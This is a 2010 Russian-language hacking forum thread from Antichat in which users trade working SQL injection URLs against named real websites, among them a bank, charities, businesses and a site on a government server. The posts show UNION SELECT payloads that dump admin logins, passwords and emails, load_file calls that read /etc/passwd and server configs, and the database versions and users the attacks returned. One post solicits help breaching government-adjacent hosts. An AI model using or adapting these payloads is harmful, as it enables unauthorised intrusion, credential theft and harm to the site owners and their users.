ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #12291  
Старый 05.06.2010, 14:23
Аватар для CyberHunter
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031

Репутация: 256


Отправить сообщение для CyberHunter с помощью ICQ
По умолчанию

Код:
http://www.langoldccc.org.uk/index.php?option=com_gcalendar&view=event&eventID=peler&start=memek&end=kentu&gcid=2+AND+1=2+UNION+SELECT+0,concat%28username,0x3a,password%29,2,3,4+from+jos_users--
PR: 2
CY: 0
 
Ответить с цитированием

  #12292  
Старый 05.06.2010, 15:25
Аватар для qq6ka
qq6ka
Познающий
Регистрация: 21.05.2010
Сообщений: 37
Провел на форуме:
167126

Репутация: 55
По умолчанию

http://www.ambicom.com/prod_detail.php?pid=-1+union+select+1,2,3,4,5,load_file(0x2f6574632f706 173737764),7,8,9,10,11,12,13,14,15--

http://www.scmmicro.com/security/view_product_en.php?PID=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,load_fil e(0x2f6574632f706173737764),14,15,16,17,18,19,20,2 1,22--

http://www.decoprint.fr/products.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,load_file(0 x2f6574632f617061636865322f73697465732d656e61626c6 5642f3030302d64656661756c74)--
 
Ответить с цитированием

  #12293  
Старый 05.06.2010, 15:56
Аватар для BlackFan
BlackFan
Новичок
Регистрация: 03.01.2009
Сообщений: 27
Провел на форуме:
367442

Репутация: 41
По умолчанию

Код:
http://www.zenit-trade.ru/news/id219+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10+limit+1,1/
zenitt@localhost:5.0.45:zenitt



Код:
http://pic.fc-zenit.ru/info/viewPhoto.phtml?gallery=461+and+substring(version(),1,1)=5
 
Ответить с цитированием

  #12294  
Старый 05.06.2010, 18:22
Аватар для qq6ka
qq6ka
Познающий
Регистрация: 21.05.2010
Сообщений: 37
Провел на форуме:
167126

Репутация: 55
По умолчанию

http://www.neocutis.com/article.php?sid=-15+union+select+1,2,3,concat_ws(0x2a,user(),versio n(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19--

neocutis@localhost*5.0.84-log*neocutis, читает файлы, шелл льётся на "ура", но safe_mode: ON; Disable functions : set_time_limit,passthru,exec,system,popen,shell_ex ec,proc_open; Linux imu200 2.6.27.34-imu-x86 #1 SMP Wed Sep 16 10:41:11 CEST 2009 i686
 
Ответить с цитированием

  #12295  
Старый 05.06.2010, 20:25
Аватар для CyberHunter
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031

Репутация: 256


Отправить сообщение для CyberHunter с помощью ICQ
По умолчанию

Код:
http://www.fittleworth.net/index.php?option=com_gcalendar&view=event&eventID=peler&start=memek&end=kentu&gcid=2+AND+1=2+UNION+SELECT+0,concat%28database%28%29,user%28%29,version%28%29%29,2,3,4+from+jos_users--
Version: 4.1.22-standard
Database: jmedfit_jcmsfittle
User: jmedfit_jcmsfit@localhost
 
Ответить с цитированием

  #12296  
Старый 05.06.2010, 23:26
Аватар для Konqi
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Ameria Bank

http://www.ameria.am/index.php?page=8+and+1=0+union+select+1,2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19--

user () : ameria_dbuser@localhost

version () : 5.0.90-community-log

database () : ameria_site

OS : pc-linux-gnu

PR-5
 
Ответить с цитированием

  #12297  
Старый 06.06.2010, 02:06
Аватар для wildshaman
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062

Репутация: 1550


Отправить сообщение для wildshaman с помощью ICQ
По умолчанию

Сайт на серваке с правительственным ege.edu.ru и mob.gov.ru
Кто доберется до него - прошу в ПМ
Код:
http://contest.informika.ru/lot_list.php?st2=1&dir&action=&cont=&lot=&y_beg=2005&y_fin=-2006+union+select+1,unhex(hex(concat_ws(0x3a,user(),version(),database()))),3,4,5/*
www@localhost:4.1.13:contest

Последний раз редактировалось wildshaman; 06.06.2010 в 02:10..
 
Ответить с цитированием

  #12298  
Старый 06.06.2010, 13:50
Аватар для aka_zver
aka_zver
Постоянный
Регистрация: 17.09.2009
Сообщений: 775
Провел на форуме:
3132379

Репутация: 1069


Отправить сообщение для aka_zver с помощью ICQ Отправить сообщение для aka_zver с помощью AIM Отправить сообщение для aka_zver с помощью MSN Отправить сообщение для aka_zver с помощью Yahoo
По умолчанию

http://newen.pdpegypt.org
ТИЦ: 0
PR: 4
Код:
http://newen.pdpegypt.org/cms.php?id=event_details&event_id=-14+union+select+1,2,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--+  

http://newen.pdpegypt.org/cms.php?id=event_details&event_id=-14+union+select+1,2,group_concat(0x0b,username,0x3a,pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+admin--+  

http://newen.pdpegypt.org/cms.php?id=event_details&event_id=-14+union+select+1,2,group_concat(0x0b,email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+ebulletin_user--+
ver - 5.1.41
usr - pdpegypt_pdp@localhost
db - pdpegypt_newpdp
os - unknown-linux-gnu

==========================================

http://www.connectcatering.co.uk
ТИЦ: 10
PR: 3
Код:
http://www.connectcatering.co.uk/cms.php?id=-8'+union+select+1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),3,4,group_concat(0x0b,admin_login,0x3a,admin_password,0x3a,admin_email),6+from+admin--+
ver - 5.1.44-community
usr - web136-connectco@localhost
db - web136-connectco
os - pc-linux-gnu

==========================================

http://cashback.2cashback.net
ТИЦ: 0
PR: 3
Код:
http://cashback.2cashback.net/cms.php?id=group_shops&group_id=-14+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,group_concat(0x0b,username,0x3a,pass,0x3a,email),concat_ws(0x0b,version(),user(),database(),@@version_compile_os),17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46+from+admin--+
ver - 5.1.41
usr - cashback_cashbac@localhost
db - cashback_cashback
os - unknown-linux-gnu

==========================================

http://www.malaysiatravelguide.com.my
ТИЦ: 0
PR: 3
Код:
http://www.malaysiatravelguide.com.my/cms.php?id=-397+/*!union+select+1,2,3,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),5,6,7*/--+  

http://www.malaysiatravelguide.com.my/cms.php?id=-397+/*!union+select+1,2,3,group_concat(0x0b,username,0x3a,password,0x3a,email),5,6,7+from+xmb_members*/--+
ver - 5.0.90-community
usr - malaysia_malaysi@localhost
db - malaysia_mtg
os - pc-linux-gnu

==========================================

http://www.damentrading.nl
ТИЦ: 0
PR: 2
Код:
http://www.damentrading.nl/damen/redir.php?goto=/damen/vesselinfo.php?id=-293+union+select+1,2,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),4,5,group_concat(0x0b,gebruikersnaam,0x3a,wachtwoord),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+dms_gebruikers--+
ver - 5.0.77-log
usr - dms@81.18.166.70
db - dms
os - pc-linux-gnu

==========================================

http://kimrealty.allrealestate.com.my
ТИЦ: 10
PR: 2
Код:
http://kimrealty.allrealestate.com.my/ag_result.php?agentid=-1+/*!or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(concat_ws(0x0b,version(),user(),database(),@@version_compile_os),floor(rand(0)*2)))*/--+
ver - 5.0.90-community
usr - allreale_kim@localhost
db - allreale_kimrealty
os - unknown-linux-gnu

==========================================

http://rselectricalsupply.com
ТИЦ: 0
PR: 2
Код:
http://rselectricalsupply.com/modules/user/cms.php?id=-3+union+select+1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),3,4--+
ver - 5.0.90
usr - rselectric966004@web163c6.megawebservers.com
db - phpmy1_rselectricalsupply_com
os - pc-linux-gnu

==========================================

http://www.avalonmortgage.com
ТИЦ: 0
PR: 1
Код:
http://www.avalonmortgage.com/cms.php?id=-11'+union+select+1,2,3,4,5,6,7,8,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),10,11,12,13--+
ver - 5.1.39-log
usr - avmusr@cort.dreamhost.com
db - avalonmotgagedb
os - pc-linux-gnu

==========================================

http://www.xcontrols.com
ТИЦ: 10
PR: 1
Код:
http://www.xcontrols.com/cms.php?id=-53'+union+select+1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),group_concat(0x0b,user,0x3a,password,0x3a,email),4+from+bloly_User--+  

http://www.xcontrols.com/cms.php?id=-53'+union+select+1,now(),group_concat(0x0b,sUserName,0x3a,sPassword),4+from+xls_users--+
ver - 5.0.77-log
usr - xcl@localhost
db - xcldb
os - portbld-freebsd6.3

==========================================

http://ontariooilng.com
ТИЦ: 0
PR: 0
Код:
http://ontariooilng.com/cms.php?ID=-6+union+select+1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),3,group_concat(0x0b,UserName,0x3a,Password,0x3a,Email)+from+admin--+
ver - 5.0.89-COMMUNITY
usr - ONTARIOO_ONTARIO@LOCALHOST
db - ONTARIOO_ONTARIOOILING
os - PC-LINUX-GNU

Последний раз редактировалось aka_zver; 06.06.2010 в 15:58..
 
Ответить с цитированием

  #12299  
Старый 06.06.2010, 16:02
Аватар для qq6ka
qq6ka
Познающий
Регистрация: 21.05.2010
Сообщений: 37
Провел на форуме:
167126

Репутация: 55
По умолчанию

http://www.asianpga.com/article.php?sid=-1+union+select+1,2,3,4,concat_ws(0x2a,username,pas sword,email,admin),6+FROM+apga_members+limit+0,1--

asianpga_sql@localhost*5.0.81-community*asianpga_db
 
Ответить с цитированием

  #12300  
Старый 06.06.2010, 16:58
Аватар для ZARO
ZARO
Познающий
Регистрация: 17.04.2009
Сообщений: 59
Провел на форуме:
401944

Репутация: 37
Отправить сообщение для ZARO с помощью ICQ
По умолчанию

Код:
http://www.heating.kz/index.php?p=news_more&id=117+AND+1=0+UNION+SELECT+1,2,3,concat_ws(0x3a,login,pass),5,6,7,8,9,10,11,12+FROM+ferroli_admins+--+
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ